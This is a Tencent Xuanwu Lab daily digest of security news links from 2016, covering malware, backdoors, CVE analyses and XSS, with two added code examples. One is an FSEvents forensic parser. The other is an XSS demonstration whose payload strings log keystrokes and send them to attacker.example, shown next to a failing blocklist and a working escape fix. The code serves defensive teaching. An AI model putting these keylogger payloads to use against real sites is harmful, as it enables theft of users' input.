腾讯玄武实验室安全动态推送
Tencent Xuanwu Lab Security Daily News
-
[ Attack ] EMEA #CyberPredictions - Leadership become cyber security conscious. Full Report here: http://bddy.me/22Y3J1B https://t.co/Frlpo6mYk0
"FireEye's 2016 cyber security predictions report for EMEA (Europe, the Middle East and Africa): https://t.co/Frlpo6mYk0 https://t.co/xHvHb5d391"
-
[ Attack ] In Brazil, anyone can be an overnight sensation in #cybercrime: http://bit.ly/1RzHzit #deepweb https://t.co/dLqQHq1KgV
"Investigative report on the Brazilian cybercrime underground, from Trend Micro: https://t.co/dLqQHq1KgV https://t.co/Oe0GfaV6el #deepweb"
-
[ Attack ] The Canadian underground is vastly different from its neighbor: http://bit.ly/1Z4qnR2 #deepweb
"The current cyber threat landscape in Canada, from the Trend Micro blog: https://t.co/CUxSRiPWrk"
-
[ Attack ] New RAT Trochilus Skilled at Espionage, Evading Detection https://asert.arbornetworks.com/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-Uncovering-the-Seven-Pointed-Dagger.pdf
"Seven Pointed Dagger: discovery of the new APT remote access tool Trochilus and other targeted threats, from Arbor's analysis report: https://t.co/x0QCICfW8U"
-
[ Browser ] Bugs From Hell: Injected Third-party Code + Detours = a Bad Time - http://dblohm7.ca/blog/2016/01/11/bugs-from-hell-injected-third-party-code-plus-detours-equals-a-bad-time/
"Bugs from hell: debugging analysis of a Firefox bug caused by injected third-party code hooked with Detours: https://t.co/OegeppqXfQ Bugzilla entry (id 1218473): https://bugzilla.mozilla.org/show_bug.cgi?id=1218473"
-
[ Debug ] ret-sync is a set of plugins that helps to synchronize a debugging session (WinDbg/GDB/LLDB/OllyDbg2/x64dbg) with IDA https://github.com/bootleg/ret-sync
"ret-sync: a tool for synchronizing debugging sessions between WinDbg, GDB, LLDB, OllyDbg2, x64dbg and IDA https://t.co/PsKpFN4Ofw"
-
[ Device ] Turning a webcam into a backdoor http://blog.vectranetworks.com/blog/turning-a-webcam-into-a-backdoor via @revskills
"Turning a D-Link WiFi webcam into a backdoor: https://t.co/ehLEMOwoLI"
-
[ Device ] SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 http://seclists.org/fulldisclosure/2016/Jan/26
"FortiGate OS versions 4.x up to 5.0.7 contain an SSH backdoor; PoC: https://t.co/5OjXynsHDJ From Security ToolKit, "Fortinet SSH backdoor: test report on a random sample of 4,900 machines": http://tools.pwn.ren/2016/01/12/%E9%9A%8F%E6%9C%BA4900%E5%8F%B0%E6%9C%BA%E5%99%A8%E6%A0%B7%E6%9C%AC%E6%B5%8B%E8%AF%95%E6%8A%A5%E5%91%8A.html and "Fortinet SSH backdoor: further exploitation methods": http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html Online backdoor check from Sebug: https://www.sebug.net/monster/?vul_id=90378 ZoomEye scan results for FortiGate devices: https://www.zoomeye.org/search?q=FortiGate"
-
[ Device ] Some vulns affecting Samsung "Security" cameras(hint: trivial arbitrary file read with clear-text pwds) cc @joystick http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html
"Samsung network cameras have multiple vulnerabilities, including arbitrary file read (CVE-2015-8279), weak firmware encryption (CVE-2015-8281) and user enumeration (CVE-2015-8280): https://t.co/WWrFkwUIF7"
-
[ Fuzzing ] Exploiting Trade-offs* in Symbolic Execution for Identifying Security Bugs : http://sas2015.inria.fr/sas_invited_talk.pdf (Slides)
"Finding security bugs with practical symbolic execution, from Thanassis Avgerinos's invited talk at the SAS workshop: https://t.co/vJJnF791e7 The related paper was pushed earlier: http://repository.cmu.edu/cgi/viewcontent.cgi?article=1478&context=dissertations"
-
[ Hardware ] Counting bits in hardware: reverse engineering the silicon in the ARM1 processor http://www.righto.com/2016/01/counting-bits-in-hardware-reverse.html
"Reverse engineering the silicon of the ARM1 processor (its bit-counting circuit): https://t.co/5rXfPWgqwI"
-
[ iOS ] iOS 9.3 Beta 1 arm64 Jailbreak Demo (w/ Code Injection) https://www.youtube.com/watch?v=ZDMWIl3bde8
"iOS 9.3 Beta 1 arm64 jailbreak demo, YouTube video: https://t.co/SxvyQwgZ1a"
-
[ Linux ] Write a filesystem with FUSE - http://engineering.facile.it/write-filesystem-fuse/
"Writing a filesystem with FUSE: https://t.co/eVV276TS72"
-
[ Linux ] Minnowboard Max: Enable the firmware (TXE) TPM 2.0 http://prosauce.org/blog/2016/1/11/minnowboard-max-enable-and-test-the-firmware-txe-tpm-20
"Enabling the firmware (Intel TXE) TPM 2.0 on the Minnowboard MAX development board: https://t.co/wRretxZ8qB"
-
[ Mac OS X ] Our #FOSS FSEvents parser for OSX and IOS is now available on Github https://github.com/dlcowen/FSEventsParser/tree/master #dfir #infosec as seen on the #forensiclunch
"FSEvents log parser for OS X/iOS: https://t.co/SriH4eiJZR"
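As an added example for this entry (not code from the FSEventsParser project linked above): a minimal parser for the gzip-compressed page format of the /.fseventsd/ log files, with a constructed sample log so it runs offline. The page layout and the flag-bit names are taken from public writeups of the artifact and are assumptions of this example, not Apple documentation.

```python
"""Parse FSEvents log pages as found in /.fseventsd/ on OS X and iOS.

Assumed layout (public descriptions of the artifact; an assumption here):
  file   = gzip stream holding one or more pages
  page   = magic (4 bytes: b"1SLD" v1 or b"2SLD" v2) + 4 unknown bytes
           + page length (uint32 LE, header included) + records
  record = path (NUL-terminated, relative to the volume root)
           + event id (uint64 LE) + flags (uint32 LE)
           + node id (uint64 LE, v2 pages only)
"""
import gzip
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Subset of the event flag bits, values as given in public writeups of the
# format; treat this mapping as an assumption.
FLAG_NAMES = {
    0x00000001: "FolderEvent",
    0x00000020: "EndOfTransaction",
    0x00004000: "FileEvent",
    0x01000000: "Created",
    0x02000000: "Removed",
    0x08000000: "Renamed",
    0x10000000: "Modified",
}


@dataclass
class Record:
    path: str
    event_id: int
    flags: int
    node_id: Optional[int]  # None on version-1 pages


def flag_names(flags: int) -> List[str]:
    """Decode the known flag bits; any unknown bits are reported as hex."""
    names = [name for bit, name in FLAG_NAMES.items() if flags & bit]
    unknown = flags & ~sum(FLAG_NAMES)
    if unknown:
        names.append(f"0x{unknown:08x}")
    return names


def parse_fsevents(data: bytes) -> List[Record]:
    """Decompress one .fseventsd file and walk every page in it."""
    raw = gzip.decompress(data)
    records: List[Record] = []
    off = 0
    while off + 12 <= len(raw):
        magic = raw[off:off + 4]
        if magic not in (b"1SLD", b"2SLD"):
            raise ValueError(f"unknown page magic {magic!r} at offset {off}")
        version = 1 if magic == b"1SLD" else 2
        page_len = struct.unpack_from("<I", raw, off + 8)[0]
        end = off + page_len
        if page_len < 12 or end > len(raw):
            raise ValueError(f"page at offset {off} has bad length {page_len}")
        pos = off + 12
        fixed = 12 if version == 1 else 20  # bytes after the path
        while pos < end:
            nul = raw.find(b"\x00", pos, end)
            if nul < 0 or nul + 1 + fixed > end:
                raise ValueError(f"truncated record at offset {pos}")
            path = raw[pos:nul].decode("utf-8", "replace")
            event_id, flags = struct.unpack_from("<QI", raw, nul + 1)
            node_id = None
            if version == 2:
                node_id = struct.unpack_from("<Q", raw, nul + 13)[0]
            records.append(Record(path, event_id, flags, node_id))
            pos = nul + 1 + fixed
        off = end
    return records


def build_page(version: int, recs: List[Tuple[str, int, int, int]]) -> bytes:
    """Build a page in the layout above; used only to construct the sample."""
    body = b""
    for path, event_id, flags, node_id in recs:
        body += path.encode() + b"\x00" + struct.pack("<QI", event_id, flags)
        if version == 2:
            body += struct.pack("<Q", node_id)
    magic = b"1SLD" if version == 1 else b"2SLD"
    return magic + b"\x00" * 4 + struct.pack("<I", 12 + len(body)) + body


# Constructed sample log (one v1 page, one v2 page); not from a real host.
SAMPLE_LOG = gzip.compress(
    build_page(1, [
        ("Users/alice/.ssh/authorized_keys", 0x1A2B3C, 0x10004000, 0),  # Modified|FileEvent
        ("Users/alice/.ssh", 0x1A2B3D, 0x00000021, 0),                  # FolderEvent|EndOfTransaction
    ])
    + build_page(2, [
        ("private/var/log/install.log", 0x1A2B3E, 0x01004000, 0x1234),  # Created|FileEvent
    ])
)


def events_touching(records: List[Record], needle: str) -> List[Record]:
    """Triage helper: events whose path contains a substring such as '.ssh'."""
    return [r for r in records if needle in r.path]


if __name__ == "__main__":
    for r in parse_fsevents(SAMPLE_LOG):
        print(f"{r.event_id:#x}  {'|'.join(flag_names(r.flags)):28s} {r.path}")
```

Event ids increase monotonically, so sorting records by event_id across all files in the directory gives an ordering even though the log carries no timestamps; correlate with file metadata or other logs to put times on the events.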
-
[ Malware ] Our first post! Inside Derkziel botnet https://mlwre.github.io/2015/12/11/Derkziel-Sofware.html
"Inside the Derkziel botnet: https://t.co/FRzIuLlPwo"
-
[ Malware ] Malware analysis with VM instrumentation, WMI, winexe, Volatility and Metabrik - http://www.metabrik.org/blog/2016/01/09/malware-analysis-with-vm-instrumentation-wmi-winexe-volatility-and-metabrik/
"Malware analysis with VM instrumentation, WMI, winexe, Volatility and Metabrik: https://t.co/qf7mtjXDUz"
-
[ Malware ] Ransomware evolution: Another brick in the CryptoWall https://nakedsecurity.sophos.com/2016/01/11/ransomware-evolution-another-brick-in-the-cryptowall/
"CryptoWall 4.0 appears: another brick in the CryptoWall: https://t.co/PSF1utfUGV"
-
[ Malware ] MMD-0050-2016 - Incident report: ELF Linux/Torte infection (in Wordpress) http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html
"ELF Linux/Torte botnet planted on servers through WordPress, from the MalwareMustDie blog: https://t.co/hvrIR4RwQJ"
-
[ Malware ] Ransom32 – look at the malicious package http://blog.malwarebytes.org/intelligence/2016/01/ransom32-look-at-the-malicious-package/
"Ransom32: a look at the implementation details of this JavaScript ransomware package https://t.co/F9yPUxN2ED"
-
[ Others ] New Post! Automatically Finding Weapons in Social Media Images Part 1 | Automating OSINT Blog http://bit.ly/1SKqqSq #osint #python
"Automatically finding weapons in social media images, Part 1: https://t.co/ViYUyKC1vG"
-
[ Popular Software ] SEC Consult whitepaper: Bypassing McAfee Application Whitelisting for… http://goo.gl/fb/AyjmbI #FullDisclosure
"Bypassing McAfee Application Whitelisting for critical infrastructure systems, from SEC Consult's paper: https://t.co/aYXWa8k0uy"
-
[ Popular Software ] Analysis of Adobe Flash Player ID3 Tag Parsing Integer Overflow Vulnerability (CVE-2015-5560) https://blog.coresecurity.com/2016/01/12/analysis-of-adobe-flash-player-id3-tag-parsing-integer-overflow-vulnerability-cve-2015-5560/
"Analysis of the Adobe Flash Player ID3 tag parsing integer overflow vulnerability (CVE-2015-5560), from the Core Security blog: https://t.co/3HX9oT2mRJ"
-
[ Popular Software ] @Adobe updates Reader and Acrobat, patches 17 code execution flaws https://threatpost.com/adobe-patches-code-execution-flaws-in-reader-acrobat/115863/ via @threatpost
"Adobe published a security bulletin for Acrobat/Reader fixing 17 vulnerabilities, 16 of which allow code execution: https://t.co/JAUE0QTuQ0"
-
[ Vulnerability ] Analysis of CVE-2016-0035, A Remote Code Execution in Microsoft Office Excel http://sourceincite.com/2015/12/15/analysis-of-cve-2016-0035-a-remote-code-execution-in-microsoft-office-excel/ thanks to @msftsecresponse & @thezdi !
"Analysis of the Microsoft Office Excel remote code execution vulnerability (CVE-2016-0035): https://t.co/7J0QwWe5xs"
-
[ Vulnerability ] Windows Remote Desktop Protocol Security Bypass Vulnerability – CVE-2016-0019 https://technet.microsoft.com/library/security/MS16-007
"Windows Remote Desktop Protocol security feature bypass vulnerability, MS16-007 (CVE-2016-0019) https://t.co/c4WWvniJti Microsoft's security bulletin summary for this month: https://technet.microsoft.com/en-us/library/security/ms16-jan.aspx Acknowledgments: https://technet.microsoft.com/en-us/library/security/mt674627.aspx"
-
[ Web Security ] XSS Flaws lead to Keylogging,Webcams, & more http://neonprimetime.blogspot.com/2016/01/xss-flaws-lead-to-keyloggingwebcams-more.html
"Keylogging and turning on the webcam through XSS flaws: https://t.co/GmLWojopyk"
-
[ Web Security ] A XSS may have exposed users of the eBay website to phishing attacks http://securityaffairs.co/wordpress/43521/hacking/ebay-website-to-phishing-attacks.html
"An XSS flaw on the eBay website may have exposed users to phishing attacks: https://t.co/T5h8iplq4h"
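The two XSS entries above (keylogging/webcam access via XSS, and the eBay phishing case) both come down to user input reaching an HTML response unencoded. As an added example, not code from either linked article: a reflecting handler in its vulnerable form, a tag-stripping "fix" that an event-handler payload walks past, and the context-aware escaping that actually closes the hole. The template, handler names and payloads are all constructed for this example.

```python
"""Reflected XSS: vulnerable render, a blocklist that does not hold, and
the encoding fix for an HTML text-node context."""
import html
import re

# Constructed payload of the kind the post describes: once it runs in the
# victim's origin it registers a keystroke handler and exfiltrates keys.
KEYLOGGER_PAYLOAD = (
    "<script>document.onkeypress=function(e){"
    "new Image().src='https://attacker.example/k?c='+e.key}</script>"
)

# Same effect without a <script> tag, so it survives naive tag stripping.
EVENT_HANDLER_PAYLOAD = (
    "<img src=x onerror=\"document.onkeypress=function(e){"
    "new Image().src='https://attacker.example/k?c='+e.key}\">"
)

# Hypothetical search-results page; the query lands in an HTML text node.
TEMPLATE = "<html><body><p>Results for: {query}</p></body></html>"


def render_vulnerable(query: str) -> str:
    """Reflects user input straight into the HTML response."""
    return TEMPLATE.format(query=query)


def render_blocklist(query: str) -> str:
    """Common 'fix': strip <script> tags. Any other element carrying an
    event-handler attribute (onerror, onload, ...) still executes."""
    cleaned = re.sub(r"(?is)<\s*/?\s*script[^>]*>", "", query)
    return TEMPLATE.format(query=cleaned)


def render_escaped(query: str) -> str:
    """Correct for this context: entity-encode the input. quote=True also
    encodes " and ', so the same call is safe inside a quoted attribute."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def is_markup_injected(page: str, payload: str) -> bool:
    """Does the rendered page still contain the payload's opening tag?"""
    tag = re.match(r"<\s*([a-zA-Z]+)", payload).group(1)
    return re.search(rf"(?i)<{tag}\b", page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("blocklist", render_blocklist),
                         ("escaped", render_escaped)):
        for payload in (KEYLOGGER_PAYLOAD, EVENT_HANDLER_PAYLOAD):
            hit = is_markup_injected(render(payload), payload)
            print(f"{name:10s} {payload[:12]!r:16s} injected={hit}")
```

The decisive variable is output context: html.escape is right for text nodes and quoted attribute values, but not for input placed inside a script block, an unquoted attribute, a URL, or CSS, each of which needs its own encoder. A Content-Security-Policy without 'unsafe-inline' is worthwhile defence in depth, since both payloads above rely on inline script.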
-
[ Windows ] Quick tutorial on how to go from a dead Windows process to EoP. http://googleprojectzero.blogspot.com/2016/01/raising-dead.html
"Raising the Dead: privilege escalation from a dying process, exploiting an arbitrary handle capture issue in NtCreateLowBoxToken: https://t.co/jjH8FsUJRn NtCreateLowBoxToken issue: https://code.google.com/p/google-security-research/issues/detail?id=483"